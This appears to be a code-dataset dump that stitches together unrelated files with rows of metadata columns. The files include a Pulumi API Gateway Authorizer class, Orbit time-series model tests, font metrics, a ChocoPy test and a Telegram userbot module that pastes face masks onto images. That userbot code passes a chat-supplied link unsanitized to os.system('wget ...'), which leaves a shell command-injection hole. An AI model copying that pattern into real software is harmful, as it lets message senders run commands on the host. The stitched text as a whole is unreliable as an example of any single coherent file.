authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None) -> 'Authorizer':
"""
Get an existing Authorizer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
        :param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and the request will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AuthorizerState.__new__(_AuthorizerState)
__props__.__dict__["authorizer_credentials"] = authorizer_credentials
__props__.__dict__["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
__props__.__dict__["authorizer_uri"] = authorizer_uri
__props__.__dict__["identity_source"] = identity_source
__props__.__dict__["identity_validation_expression"] = identity_validation_expression
__props__.__dict__["name"] = name
__props__.__dict__["provider_arns"] = provider_arns
__props__.__dict__["rest_api"] = rest_api
__props__.__dict__["type"] = type
return Authorizer(resource_name, opts=opts, __props__=__props__)
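    # Illustrative sketch (hypothetical provider ID): adopting an authorizer
    # that already exists in AWS into a Pulumi program:
    #   imported = Authorizer.get("imported", id="ab12cd3efg")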
@property
@pulumi.getter(name="authorizerCredentials")
def authorizer_credentials(self) -> pulumi.Output[Optional[str]]:
"""
The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
"""
return pulumi.get(self, "authorizer_credentials")
@property
@pulumi.getter(name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> pulumi.Output[Optional[int]]:
"""
The TTL of cached authorizer results in seconds. Defaults to `300`.
"""
return pulumi.get(self, "authorizer_result_ttl_in_seconds")
@property
@pulumi.getter(name="authorizerUri")
def authorizer_uri(self) -> pulumi.Output[Optional[str]]:
"""
The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
"""
return pulumi.get(self, "authorizer_uri")
@property
@pulumi.getter(name="identitySource")
def identity_source(self) -> pulumi.Output[Optional[str]]:
"""
The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
"""
return pulumi.get(self, "identity_source")
@property
@pulumi.getter(name="identityValidationExpression")
def identity_validation_expression(self) -> pulumi.Output[Optional[str]]:
"""
        A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and the request will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
"""
return pulumi.get(self, "identity_validation_expression")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the authorizer
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="providerArns")
def provider_arns(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
"""
return pulumi.get(self, "provider_arns")
@property
@pulumi.getter(name="restApi")
def rest_api(self) -> pulumi.Output[str]:
"""
The ID of the associated REST API
"""
return pulumi.get(self, "rest_api")
@property
@pulumi.getter
def type(self) -> pulumi.Output[Optional[str]]:
"""
The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
return pulumi.get(self, "type")
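# Illustrative sketch (assumes the `demo_authorizer` from the usage example
# above): the output properties are Pulumi Outputs and can be exported:
#   pulumi.export("authorizer_type", demo_authorizer.type)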
| 54.197605 | 413 | 0.671859 | 4,380 | 36,204 | 5.373744 | 0.0621 | 0.062625 | 0.06305 | 0.056082 | 0.92994 | 0.921485 | 0.91439 | 0.911034 | 0.905723 | 0.893954 | 0 | 0.009092 | 0.225334 | 36,204 | 667 | 414 | 54.278861 | 0.830136 | 0.480941 | 0 | 0.821317 | 1 | 0 | 0.115005 | 0.061597 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163009 | false | 0.003135 | 0.015674 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
317f34029cd1b57f437537aeb2f0dd73c8d98d6d | 226 | py | Python | Sistema_medico1/accounts/decorats.py | teamingsoft01/teamingsoft01 | 3284abc6b4e0d1f2f25c70f5475f0d554ba9bece | [
"CC0-1.0"
] | null | null | null | Sistema_medico1/accounts/decorats.py | teamingsoft01/teamingsoft01 | 3284abc6b4e0d1f2f25c70f5475f0d554ba9bece | [
"CC0-1.0"
] | null | null | null | Sistema_medico1/accounts/decorats.py | teamingsoft01/teamingsoft01 | 3284abc6b4e0d1f2f25c70f5475f0d554ba9bece | [
"CC0-1.0"
] | null | null | null | from django.http import HttpResponse
from django.shortcuts import redirect
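# Usage sketch (hypothetical view; standard Django request/response flow):
#   @user
#   def dashboard(request):
#       return HttpResponse("ok")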
def user(view_func):
    # Pass-through decorator: wraps a Django view without adding behavior yet;
    # access-control checks (e.g. login redirects) would normally go here.
    def wrapper_fun(request, *args, **kwargs):
        return view_func(request, *args, **kwargs)
return wrapper_fun | 28.25 | 50 | 0.712389 | 29 | 226 | 5.413793 | 0.586207 | 0.127389 | 0.216561 | 0.292994 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199115 | 226 | 8 | 51 | 28.25 | 0.867403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.166667 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
318526f302efb59a1d81281939b4b915490c93e1 | 9,530 | py | Python | tests/orbit/models/test_lgt.py | szmark001/orbit | ad13b094d59c16e15159d658f8b8ce9383f52b13 | [
"Apache-2.0"
] | null | null | null | tests/orbit/models/test_lgt.py | szmark001/orbit | ad13b094d59c16e15159d658f8b8ce9383f52b13 | [
"Apache-2.0"
] | null | null | null | tests/orbit/models/test_lgt.py | szmark001/orbit | ad13b094d59c16e15159d658f8b8ce9383f52b13 | [
"Apache-2.0"
] | null | null | null | import pytest
from orbit.estimators.pyro_estimator import PyroEstimator, PyroEstimatorVI, PyroEstimatorMAP
from orbit.estimators.stan_estimator import StanEstimator, StanEstimatorMCMC, StanEstimatorVI, StanEstimatorMAP
from orbit.models.lgt import BaseLGT, LGTFull, LGTAggregated, LGTMAP
def test_base_lgt_init():
lgt = BaseLGT()
is_fitted = lgt.is_fitted()
model_data_input = lgt._get_model_data_input()
model_param_names = lgt._get_model_param_names()
init_values = lgt._get_init_values()
assert not is_fitted # model is not yet fitted
assert not model_data_input # should only be initialized and not set
assert model_param_names # model param names should already be set
# todo: change when init_values callable is implemented
assert not init_values
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI])
def test_lgt_full_univariate(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
prediction_percentiles=[5, 95],
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction_lower', 'prediction', 'prediction_upper']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 13
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
def test_lgt_full_univariate_pyro(synthetic_data):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
prediction_percentiles=[5, 95],
seasonality=52,
num_steps=10,
verbose=False,
estimator_type=PyroEstimatorVI
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction_lower', 'prediction', 'prediction_upper']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 12 # no `lp__` in pyro
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI])
def test_lgt_aggregated_univariate(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTAggregated(
response_col='response',
date_col='week',
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 13
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
def test_lgt_aggregated_univariate_pyro(synthetic_data):
train_df, test_df, coef = synthetic_data
lgt = LGTAggregated(
response_col='response',
date_col='week',
seasonality=52,
verbose=False,
num_steps=10,
estimator_type=PyroEstimatorVI
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 12 # no `lp__` in pyro
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMAP, PyroEstimatorMAP])
def test_lgt_map_univariate(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTMAP(
response_col='response',
date_col='week',
seasonality=52,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 12 # no `lp__` parameter in optimizing()
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI])
def test_lgt_non_seasonal_fit(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
estimator_type=estimator_type,
num_warmup=50,
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 11
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
def test_lgt_non_seasonal_fit_pyro(synthetic_data):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
estimator_type=PyroEstimatorVI,
num_steps=10
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 10 # no `lp__` in pyro
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI, PyroEstimatorVI])
@pytest.mark.parametrize(
"regressor_signs",
[
["+", "+", "+", "+", "+", "+"],
["=", "=", "=", "=", "=", "="],
["+", "=", "+", "=", "+", "+"]
],
ids=['positive_only', 'regular_only', 'mixed_signs']
)
def test_lgt_full_with_regression(synthetic_data, estimator_type, regressor_signs):
train_df, test_df, coef = synthetic_data
if issubclass(estimator_type, StanEstimator):
lgt = LGTFull(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
prediction_percentiles=[5, 95],
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
elif issubclass(estimator_type, PyroEstimator):
lgt = LGTFull(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
prediction_percentiles=[5, 95],
seasonality=52,
num_steps=10,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
regression_out = lgt.get_regression_coefs()
num_regressors = regression_out.shape[0]
expected_columns = ['week', 'prediction_lower', 'prediction', 'prediction_upper']
expected_shape = (51, len(expected_columns))
expected_regression_shape = (6, 3)
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert regression_out.shape == expected_regression_shape
assert num_regressors == len(train_df.columns.tolist()[2:])
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI, PyroEstimatorVI])
@pytest.mark.parametrize(
"regressor_signs",
[
["+", "+", "+", "+", "+", "+"],
["=", "=", "=", "=", "=", "="],
["+", "=", "+", "=", "+", "+"]
],
ids=['positive_only', 'regular_only', 'mixed_signs']
)
def test_lgt_aggregated_with_regression(synthetic_data, estimator_type, regressor_signs):
train_df, test_df, coef = synthetic_data
if issubclass(estimator_type, StanEstimator):
lgt = LGTAggregated(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
elif issubclass(estimator_type, PyroEstimator):
lgt = LGTAggregated(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
seasonality=52,
num_steps=10,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
regression_out = lgt.get_regression_coefs()
num_regressors = regression_out.shape[0]
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_regression_shape = (6, 3)
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert regression_out.shape == expected_regression_shape
assert num_regressors == len(train_df.columns.tolist()[2:])
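# These tests can be run selectively with pytest, e.g.:
#   pytest tests/orbit/models/test_lgt.py -k "full_univariate"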
| 32.087542 | 111 | 0.677335 | 1,076 | 9,530 | 5.657993 | 0.110595 | 0.074737 | 0.04435 | 0.041557 | 0.876643 | 0.872043 | 0.867444 | 0.867444 | 0.867444 | 0.867444 | 0 | 0.012552 | 0.214166 | 9,530 | 296 | 112 | 32.195946 | 0.800374 | 0.025813 | 0 | 0.806867 | 0 | 0 | 0.062102 | 0 | 0.008584 | 0 | 0 | 0.003378 | 0.141631 | 1 | 0.042918 | false | 0 | 0.017167 | 0 | 0.060086 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31a4accc73a27a8a6f3e1f3490f7ca34b3893e09 | 189 | py | Python | src/abaqus/StepMiscellaneous/SubstructureGenerateFrequencyArray.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/StepMiscellaneous/SubstructureGenerateFrequencyArray.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/StepMiscellaneous/SubstructureGenerateFrequencyArray.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from .SubstructureGenerateFrequency import SubstructureGenerateFrequency
class SubstructureGenerateFrequencyArray(list[SubstructureGenerateFrequency]):
    def findAt(self):
        # Stub in this generated wrapper; no lookup behavior is implemented.
        pass
| 27 | 78 | 0.830688 | 12 | 189 | 13.083333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121693 | 189 | 6 | 79 | 31.5 | 0.945783 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
9ed1fc7283a086f8d3b9579e596e036f349a505c | 114 | py | Python | yawl/shared/constants.py | gbieul/yawl | 2b31f97b72a6e80de53c52aafe65459fbbe28756 | [
"MIT"
] | null | null | null | yawl/shared/constants.py | gbieul/yawl | 2b31f97b72a6e80de53c52aafe65459fbbe28756 | [
"MIT"
] | null | null | null | yawl/shared/constants.py | gbieul/yawl | 2b31f97b72a6e80de53c52aafe65459fbbe28756 | [
"MIT"
] | null | null | null | import os
from typing_extensions import Final
SERVICE_ACCOUNT_EMAIL: Final = os.getenv("SERVICE_ACCOUNT_EMAIL")
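# Note: os.getenv returns None when SERVICE_ACCOUNT_EMAIL is unset; callers
# that require a value could use os.environ["SERVICE_ACCOUNT_EMAIL"] to fail fast.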
| 19 | 65 | 0.833333 | 16 | 114 | 5.625 | 0.625 | 0.311111 | 0.422222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 114 | 5 | 66 | 22.8 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0.184211 | 0.184211 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9ed21a15f4a257ce2ca8a1124d24f9f4be7221fa | 2,588 | py | Python | userbot/modules/rpic.py | akborana/Devil | 30ef9c5ac910d6344e206921e343a0932ffd6460 | [
"MIT"
] | 1 | 2021-05-06T18:30:50.000Z | 2021-05-06T18:30:50.000Z | userbot/modules/rpic.py | hellboi-atul/javes-3.0 | 8777d482bd1ee877a96332a2cd84d880c151fa43 | [
"MIT"
] | null | null | null | userbot/modules/rpic.py | hellboi-atul/javes-3.0 | 8777d482bd1ee877a96332a2cd84d880c151fa43 | [
"MIT"
] | null | null | null | from PIL import Image
import sys
import os
from userbot.utils import admin_cmd
from userbot import bot
from userbot import bot as borg
if not os.path.isdir("./rpic/"):
os.makedirs("./rpic/")
@bot.on(admin_cmd(pattern=r"rpic"))
async def scan(event):
path = "rpic"
    await event.delete()
reply = await event.get_reply_message()
lol = await borg.download_media(reply.media, path)
    linc = event.text
    # slice the mask-image URL and its file name out of the command text
    link = linc[6:]
    pic = linc[30:]
    import cv2  # imported here so OpenCV only loads when the command runs
    # fetch the mask image (note: the link is passed to the shell unsanitized)
    os.system(f'wget {link}')
imagePath = lol
maskPath = f"{pic}"
#cascPath = "haarcascade_frontalface_default.xml"
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + "haarcascade_frontalface_default.xml")
image = cv2.imread(imagePath)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(gray, 1.15)
background = Image.open(imagePath)
for (x, y, w, h) in faces:
mask = Image.open(maskPath)
mask = mask.resize((w, h), Image.ANTIALIAS)
offset = (x, y)
background.paste(mask, offset, mask=mask)
file_name = "rpic.png"
hehe = path + "/" + file_name
background.save(hehe, "PNG")
await borg.send_file(event.chat_id, hehe)
for files in (hehe, lol):
if files and os.path.exists(files):
os.remove(files)
@bot.on(admin_cmd(pattern=r"crpic"))
async def cat_scan(event):  # cat-face variant of the handler above
path = "rpic"
    await event.delete()
reply = await event.get_reply_message()
lol = await borg.download_media(reply.media, path)
    linc = event.text
    # slice the mask-image URL and its file name out of the command text
    link = linc[7:]
    pic = linc[31:]
    import cv2  # imported here so OpenCV only loads when the command runs
    # fetch the mask image (note: the link is passed to the shell unsanitized)
    os.system(f'wget {link}')
imagePath = lol
maskPath = f"{pic}"
#cascPath = "haarcascade_frontalcatface.xml"
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + "haarcascade_frontalcatface.xml")
image = cv2.imread(imagePath)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(gray, 1.15)
background = Image.open(imagePath)
for (x, y, w, h) in faces:
mask = Image.open(maskPath)
mask = mask.resize((w, h), Image.ANTIALIAS)
offset = (x, y)
background.paste(mask, offset, mask=mask)
file_name = "rpic.png"
hehe = path + "/" + file_name
background.save(hehe, "PNG")
await borg.send_file(event.chat_id, hehe)
for files in (hehe, lol):
if files and os.path.exists(files):
os.remove(files)
| 22.310345 | 102 | 0.613988 | 331 | 2,588 | 4.725076 | 0.283988 | 0.025575 | 0.021739 | 0.025575 | 0.847826 | 0.847826 | 0.820972 | 0.820972 | 0.73913 | 0.73913 | 0 | 0.013641 | 0.263524 | 2,588 | 115 | 103 | 22.504348 | 0.806926 | 0.035162 | 0 | 0.764706 | 0 | 0 | 0.060995 | 0.026083 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ef88006c6b35879a6708473ae4cc0a9e9633978 | 1,494 | py | Python | venv/lib/python2.7/site-packages/pychart/afm/Utopia_BoldItalic.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | 1 | 2019-12-19T01:53:13.000Z | 2019-12-19T01:53:13.000Z | venv/lib/python2.7/site-packages/pychart/afm/Utopia_BoldItalic.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | venv/lib/python2.7/site-packages/pychart/afm/Utopia_BoldItalic.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | # AFM font Utopia-BoldItalic (path: /usr/share/fonts/afms/adobe/putbi8a.afm).
# Derived from Ghostscript distribution.
# Go to www.cs.wisc.edu/~ghost to get the Ghostscript source code.
import dir
dir.afm["Utopia-BoldItalic"] = (500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 210, 285, 455, 560, 560, 896, 752, 246, 350, 350, 500, 600, 280, 392, 280, 260, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 280, 280, 600, 600, 600, 454, 828, 634, 680, 672, 774, 622, 585, 726, 800, 386, 388, 688, 586, 921, 741, 761, 660, 761, 681, 551, 616, 776, 630, 920, 630, 622, 618, 350, 460, 350, 600, 500, 246, 596, 586, 456, 609, 476, 348, 522, 629, 339, 333, 570, 327, 914, 635, 562, 606, 584, 440, 417, 359, 634, 518, 795, 516, 489, 466, 340, 265, 340, 600, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 285, 560, 560, 100, 560, 560, 568, 560, 246, 455, 560, 360, 360, 651, 652, 500, 500, 514, 490, 280, 500, 580, 465, 246, 455, 455, 560, 1000, 1297, 500, 454, 500, 400, 400, 400, 400, 400, 400, 402, 400, 500, 400, 400, 500, 400, 350, 400, 1000, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 890, 500, 444, 500, 500, 500, 500, 592, 761, 1016, 412, 500, 500, 500, 500, 500, 789, 500, 500, 500, 339, 500, 500, 339, 562, 811, 628, )
| 249 | 1,297 | 0.624498 | 287 | 1,494 | 3.250871 | 0.400697 | 0.578778 | 0.790997 | 0.977492 | 0.33119 | 0.29582 | 0.29582 | 0.29582 | 0.29582 | 0.263666 | 0 | 0.625822 | 0.186078 | 1,494 | 5 | 1,298 | 298.8 | 0.141447 | 0.119143 | 0 | 0 | 0 | 0 | 0.012957 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
733187760aa038a9d779605f56d5bbf9a4ccf3bd | 32 | py | Python | src/test/data/pa1/AdditionalTestCase/correct_tabaswhitespaces_indent.py | Leo-Enrique-Wu/chocopy_compiler_parser | b6e94b6a1950407879e921dc379c951ea365f5a4 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa1/AdditionalTestCase/correct_tabaswhitespaces_indent.py | Leo-Enrique-Wu/chocopy_compiler_parser | b6e94b6a1950407879e921dc379c951ea365f5a4 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa1/AdditionalTestCase/correct_tabaswhitespaces_indent.py | Leo-Enrique-Wu/chocopy_compiler_parser | b6e94b6a1950407879e921dc379c951ea365f5a4 | [
"BSD-2-Clause"
] | null | null | null | if a > 2:
x = 2
y = 3 | 10.666667 | 13 | 0.25 | 7 | 32 | 1.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.625 | 32 | 3 | 14 | 10.666667 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
735ab8c2aa24d426751e4169c19f6d8543057292 | 164 | py | Python | os_android_apk_builder/__init__.py | sqralhashimi/os_android_apk_builder-py | 20229033b16bf4f8775e8d4f6dcdde04d5e7e3f4 | [
"MIT"
] | 1 | 2021-08-14T16:01:16.000Z | 2021-08-14T16:01:16.000Z | os_android_apk_builder/__init__.py | sqralhashimi/os_android_apk_builder-py | 20229033b16bf4f8775e8d4f6dcdde04d5e7e3f4 | [
"MIT"
] | null | null | null | os_android_apk_builder/__init__.py | sqralhashimi/os_android_apk_builder-py | 20229033b16bf4f8775e8d4f6dcdde04d5e7e3f4 | [
"MIT"
] | null | null | null | import os_android_apk_builder.apk_builder
import os_android_apk_builder.modules.apk_builder_boilerplate
import os_android_apk_builder.modules.signin_config_handler
